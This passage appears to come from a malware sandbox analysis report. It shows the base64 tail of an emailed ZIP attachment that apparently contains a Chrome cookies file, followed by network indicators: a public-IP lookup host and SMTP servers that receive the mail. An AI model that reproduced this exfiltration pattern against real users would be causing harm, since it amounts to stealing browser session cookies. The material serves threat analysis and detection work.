aP71//zH/NXfpwVv+6//+f++3/0xe/3\r\ny/+B3/5P/P0OTnaT3/S/+jV+7Df9TX+N37T5TZ/+pv/yb/rX/qZ/wm/6/d/0N/1N//vflN3l\r\nHz0/en70/Oj50fOj50fPj54fPT96fvT86PnR86Pn/5fP7/Tr/vhv/Tv+mvH1wd/wt/117/zm\r\nv+mv2VvF+rHf7tf98d/+N/Vf0ozCr/9b/7o//lsGXwBY8jv8utv4NJLd/nV73Xs52V/nd6cv\r\nt3tfdjJ9v/ZvQ62CPjl/hATFr/tr/Ba/7u/6m9J33iLSb/D/AFBLAQIXCxQAAAgIAO5BEU+6\r\n/tz3dBIAAABQAAAjAAAAAAAAAAAAAAAAgQAAAABzdnVzenBwci5hYzEvQ2hyb21lL0RlZmF1\r\nbHQvQ29va2llc1BLBQYAAAAAAQABAFEAAAC1EgAAAAA=\r\n----boundary_0_df9e029a-1917-4f66-9070-834df45f117d--\r\n\r\n\r\n.\r\n",
555 "dst": "199.79.63.218"
556
557
558
559* Network Communication - Hosts:
560
561 "country_name": "United States",
562 "ip": "3.224.145.145",
563 "inaddrarpa": "",
564 "hostname": "checkip.amazonaws.com"
565
566
567 "country_name": "United States",
568 "ip": "199.79.63.218",
569 "inaddrarpa": "",
570 "hostname": "us3.smtp.mailhostbox.com"
571
572
573 "country_name": "United States",
574 "ip": "199.79.63.211",
575 "inaddrarpa": "",
576 "hostname": "us3.smtp.mailhostbox.com"
577
578
579
580* Network Communication - IRC: